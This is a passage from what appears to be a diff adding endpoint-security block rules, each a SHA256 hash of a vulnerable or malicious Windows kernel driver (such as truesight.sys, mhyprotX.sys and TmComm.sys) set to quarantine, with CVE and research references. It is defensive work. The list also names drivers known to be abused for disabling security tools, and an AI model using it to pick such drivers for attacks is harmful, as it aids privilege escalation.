AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b11f206e-782c-5b2a-9328-a64c163048b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618549Z", + "creation_date": 
"2026-03-23T11:45:29.618551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618556Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dde12d20a00f7987f6e53eeeee3d5667482940f06d012a0003b80f217a105d74", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1222eac-a528-527a-bcca-132ebc659adb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830125Z", + "creation_date": "2026-03-23T11:45:31.830128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5964196f057eac00f73caccae0f54d34c79f921f9c53070ad6308f9ac035c8e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1273a07-cd22-52c1-9a81-3507acb2159b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147858Z", + "creation_date": "2026-03-23T11:45:31.147860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5747e031599aa68a628608e0a074959a8af6b1f9503bf1dc4a317f95667fa1f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b12ac103-c6ab-5a9c-83a4-a7f8e0c492ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498577Z", + "creation_date": "2026-03-23T11:45:31.498580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498588Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c51320f954ce1505349fc33e06a5fabcfe3396a9736f79a119199349e99850a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b12b96d9-627f-53b3-ac7e-20a8e13a5bb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979760Z", + "creation_date": "2026-03-23T11:45:29.979762Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa833c9e3bcdc33eaf64fd913e80f5b9ce60618f6e3ff4c386420fea4a494380", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b12f89c0-92e1-5b90-aeb4-f1f90d3b7c70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605559Z", + "creation_date": "2026-03-23T11:45:29.605561Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28a1e3627deded98e1620b815422ae15f1dd1d4d643b7b92af97412961791a6a", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b137b05b-9361-5a67-9ce5-3503f1a980cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820142Z", + "creation_date": "2026-03-23T11:45:30.820144Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820149Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "047ce557cc7bb580af457c151233b5114de6efbc9bf5e8c919fab453cebe5fa6", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b137bab6-59b2-54b2-b329-f5d07b1b9fc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485257Z", + "creation_date": "2026-03-23T11:45:31.485260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485270Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5c412af37fe3f227d6d4288ae4999e14b81fd8a2e6c9705a9d4b025e4652153", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b13e09e5-ff7b-5f77-9484-80c14f927ae4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, 
+ "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974987Z", + "creation_date": "2026-03-23T11:45:29.974989Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03192bacd96989bad4181609295764f61a86d2ec9f7918a90a219e674ae3097f", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1418c62-fdfb-5179-b107-4a6e52f30ef9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143968Z", + "creation_date": "2026-03-23T11:45:31.143970Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3c2f47cd5f0ba9e70449ce7339e231be97b45a02ddcf8859018a84064faaeed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver 
(aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b146bea5-8e10-56eb-bc6c-4950767b5879", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612092Z", + "creation_date": "2026-03-23T11:45:29.612094Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612099Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "000e984d3eebc54259a24a17745eed07d9c3658b86462cb5ebc26381302f7a38", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b14a166f-e52a-5f66-ae5b-255f335ba1d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.488063Z", + "creation_date": "2026-03-23T11:45:31.488065Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488070Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9e677f9f681130a8cfa94ec0ff17120ba647ac6d323912d4eed10223ef9f21f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b14b4e59-bd7f-51b4-9ec6-93d1f6e7b2b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157187Z", + "creation_date": "2026-03-23T11:45:31.157189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49ab087361a9c59829f14b1bc9a49fb0de55649cea0564f6a27c099b4ee7338a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1585483-b5f7-5c9a-b761-140acbe61751", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614438Z", + "creation_date": "2026-03-23T11:45:29.614440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b15875cd-ac0f-507c-b1a3-785c4a715445", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828329Z", + "creation_date": "2026-03-23T11:45:30.828331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828336Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1528dc51550159f8e11866fa29b36383f49905bc84bcd0ff07260d35475d0d37", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b15b0f30-b42f-5c06-9aa6-2bc3abfd2f36", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613260Z", + "creation_date": "2026-03-23T11:45:29.613262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613267Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1631c72-c97a-5a87-996c-709053138d1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150704Z", + "creation_date": "2026-03-23T11:45:31.150706Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "962d1a1d3316212a0f66ce825c4737d41f59c2e0743be36c3e1308f0bb7939a0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b16f0a41-7402-5aa2-9fa3-c4989ea520b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146528Z", + "creation_date": "2026-03-23T11:45:32.146530Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "ab811ca59a8a8e92fff3eca9d359a8ed5482e781c97e63dbece046d929d0a79c", + "comment": "Malicious Kernel Driver (aka driver_ab811ca5.sys) [https://www.loldrivers.io/drivers/09d2e61d-e041-4ec8-ab7b-385848456a36/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b16f5f6f-b1ca-57f6-9eb8-3d6311488e34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150824Z", + "creation_date": "2026-03-23T11:45:31.150826Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de4cd4aa2021854e1bca582ec7a51562ab458bfd12a4b2930f85fa53d1e09915", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b173616e-abe7-5e26-ac44-efc7194f46e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149120Z", + "creation_date": "2026-03-23T11:45:31.149123Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149132Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "916ef806f5e08f7e5c882bd4efca3503e5e8131bb32493f8d618959eab054c78", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b191a678-ede1-5633-95a9-6688e61e93a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605806Z", + "creation_date": "2026-03-23T11:45:29.605808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd7c706caa4063ce243d2c4b7e5f32418d1ad3700692ce63618b3911981573d1", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) 
[https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b19c9ceb-6679-515b-a8b8-5ca43e46c102", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606795Z", + "creation_date": "2026-03-23T11:45:29.606797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606803Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d28acafeb6a85294d2672fa894a2934599713aa9ce1b21184dc1ec34131af7bb", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1a17760-5e85-57fe-82b5-6675cc5d7ed0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493821Z", + "creation_date": "2026-03-23T11:45:31.493825Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493834Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2c74d551604daac486eb93d4513c650842e4d7f34801038ba146d76df7100a8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1a3ce7e-9e2a-55c6-a75b-8a11998d69bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829593Z", + "creation_date": "2026-03-23T11:45:31.829595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829600Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "729d3ba336cb62d60a7581db4e98c93f1204563f5a63fc53950f09081a44bb55", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
